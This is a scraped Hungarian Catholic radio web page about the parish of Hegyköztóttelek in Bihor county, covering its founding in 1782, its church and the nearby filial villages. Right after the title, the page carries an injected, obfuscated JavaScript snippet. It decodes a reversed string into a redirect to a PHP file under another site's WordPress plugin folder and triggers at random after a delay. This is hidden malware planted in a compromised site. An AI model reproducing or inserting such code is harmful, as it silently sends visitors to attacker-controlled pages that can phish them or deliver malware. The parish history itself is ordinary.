tottelek.jpg","contentUrl":"http://www.mariaradio.ro/wp-content/uploads/2015/06/hegykoztottelek.jpg","width":450,"height":600,"caption":"hegykoztottelek.jpg"},{"@type":"WebPage","@id":"http://www.mariaradio.ro/2015/06/23/a-het-plebaniaja-hegykoztottelek/#webpage","url":"http://www.mariaradio.ro/2015/06/23/a-het-plebaniaja-hegykoztottelek/","name":"A h\u00e9t pl\u00e9b\u00e1ni\u00e1ja: HEGYK\u00d6ZT\u00d3TTELEK - M\u00e1ria R\u00e1di\u00f3 Erd\u00e9ly","isPartOf":{"@id":"http://www.mariaradio.ro/#website"},"primaryImageOfPage":{"@id":"http://www.mariaradio.ro/2015/06/23/a-het-plebaniaja-hegykoztottelek/#primaryimage"},"datePublished":"2015-06-23T12:30:02+00:00","dateModified":"2022-08-13T07:40:34+00:00","author":{"@id":"http://www.mariaradio.ro/#/schema/person/82c94139568830b97ee300374f97f3f7"},"breadcrumb":{"@id":"http://www.mariaradio.ro/2015/06/23/a-het-plebaniaja-hegykoztottelek/#breadcrumb"},"inLanguage":"hu","potentialAction":[{"@type":"ReadAction","target":["http://www.mariaradio.ro/2015/06/23/a-het-plebaniaja-hegykoztottelek/"]}]},{"@type":"BreadcrumbList","@id":"http://www.mariaradio.ro/2015/06/23/a-het-plebaniaja-hegykoztottelek/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"http://www.mariaradio.ro/"},{"@type":"ListItem","position":2,"name":"A h\u00e9t pl\u00e9b\u00e1ni\u00e1ja: HEGYK\u00d6ZT\u00d3TTELEK"}]},{"@type":"Person","@id":"http://www.mariaradio.ro/#/schema/person/82c94139568830b97ee300374f97f3f7","name":"maradmin","image":{"@type":"ImageObject","@id":"http://www.mariaradio.ro/#personlogo","inLanguage":"hu","url":"http://2.gravatar.com/avatar/590fd49f4d8e5b826516999e077dc4d7?s=96&d=mm&r=g","contentUrl":"http://2.gravatar.com/avatar/590fd49f4d8e5b826516999e077dc4d7?s=96&d=mm&r=g","caption":"maradmin"},"url":"http://www.mariaradio.ro/author/maradmin/"}]}

A hét plébániája: HEGYKÖZTÓTTELEK

hegykoz$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tottelek.jpg

Hegyköztóttelek Bihar megyében, a Bihari-Hegyköz kistérségben van, ez a vidék a Sebes-Körös és a Berettyó folyók közti, a Réz-hegység nyugati oldalához tartozó dombvidék és az Alföld közti térség. Ősidők óta magyarok által lakott terület, 10 település található itt, köztük 8 a Hegyköz előnévvel jelzi a hovatartozását. Így Hegyköztótteleken kívüli még: Hegyközcsatár, Hegyközkovácsi, Hegyközpályi, Hegyközszáldobágy,Hegyközszentimre,Hegyközszentmiklós és Hegyközújlak. A Partiumi régióban a Hegyköz és az Érmellék, a két egymás melletti kistájegység együtt, az Erdélyi Székelyföld és Kalotaszeg után a harmadik legnagyobb magyarok által lakott tömbjét alkotja. Hegyköz névvel tájegység van Észak-Magyarországon is, az Eperjes-Tokaji hegységben, Borsod-Abaúj-Zemplén megyében.

Hegyköztóttelek falu Nagyvárad megyeszékhelytől észak-keletre 17 km-re, festőien szép dombvidéken,174 m tengerszint feletti magasságban fekszik, Siter és Sitervölgye falukkal együtt Hegyközcsatár községközponthoz tartozik. A község összlakossága kb. 2200, több mint 80 százalékban magyarok. A Hegyköz vidékén, amely már a 12. században a váradi püspökség birtoka volt, a katolikus vallás visszaszorul a protestántizmus elterjedésével, napjainkban is a lakosság csak kb.15 százaléka római katolikus. Két római katolikus plébánia fogja össze a katolikus híveket, a hegyközcsatári Szűz Mária neve plébánia és a hegyköztótteleki Szent József plébánia. Hegyköztótteleket 1782-ben gróf Kollonitz László (1736-1817) váradi püspök, a püspöki birtok erdőkitermelésére, 41 szlovák katolikus család betelepítésével alapítja. 1788-ban már önálló plébánia, kis fatornyú, zsindejes templomával. A hívek számának növekedésével, a szlovák ajkúak elmagyarosodtak, szükségessé vált egy nagyobb templom építése, Lajcsák Ferenc(1772-1843) váradi püspök jóvoltából 1832-34 között épül fel, amelyet maga az építtető püspök konszekrál 1834. október 12-én. A templom 30 m magas tornyával egy dombtetőn áll, Szent József, Jézus nevelőapja a titulusa. IX. Piusz pápa 1870-ben Szent Józsefet Szent Péterrel együtt a katolikus egyház védőszentjeivé nyilvánította. A templom főoltárképe hű másolata ismeretlen festő által, a nagyváradi székesegyház bal oldali kereszthajó Szent Család oltárképének (Vincenz Fischer bécsi akadémiai festő 1788-ban készült alkotása). Úgyszintén ismeretlen mester munkája a templomban a két 1826-ból való olajfestmény: a keresztre feszített Krisztus és a Nepomuki Szent János kép.

A Hegyköztótteleki Szent József plébánia a Nagyváradi Római Katolikus Egyházmegye, Székesegyházi főesperesség, Várad-környéki esperesi kerületéhez tartozik, plébánosa Kruzslitz Imre atya, rádiónk hűséges önkéntes munkatársa is, aki úgyszintén ellátja a Hegyközcsatári Szűz Mária neve plébániát, valamint a filiákat, Hegyközpályit, Hegyközújlakot és Sitert is, itt a katolikus hívek száma kicsi a többségi református hitűekhez képest.

- Hegyközújlak az 1700-as évek elején a váradi káptalanhoz tartozott, temploma Nepomuki Szent János tiszteletére van szentelve, majd Csáky Miklós (1698-1757) váradi püspök 1743-ban áthelyezte a plébániát Hegyközcsatárra, ekkor már a püspökség a kegyura. Mai temploma 1807-1809 között épült, egy nagy tűzvész után a leégett templomot és plébániát 1847-ben Bémer László (1784-1862) váradi püspök építtette át.

- Hegyközpályiban 2002-ben épült és szentelte fel Tempfli József akkori megyéspüspök, az Isteni Irgalmassága titulusú miséző kápolnát. - Siter falu többségben protestáns, híres az itteni műemlék református templom,12.-13. században épült román stílusban, a 2002-ben elkezdődött kutatások és felújítás alkalmával a vidék legértékesebb 13.-14.- századi falfestményeket tártak fel.

A környékén lévő festői fekvésű Bangéta-horgásztó nagyon kedvelt kiránduló hely. Hegyköztótteleken a templom és a plébánia szépen fel van újítva, 2010 márciusában a templom búcsú alkalmával, Böcskei László nagyváradi megyéspüspök áldotta meg az újonnan épült ravatalozó kápolna harangját.

A nagyváradi egyházmegye 2003-ban kiadott történelmi sematizmusából vett információk alapján, szerkesztette: Szebeni Lajos.

Fotó: hegykozi.blogspot.ro

About the author

maradmin

Leave a Comment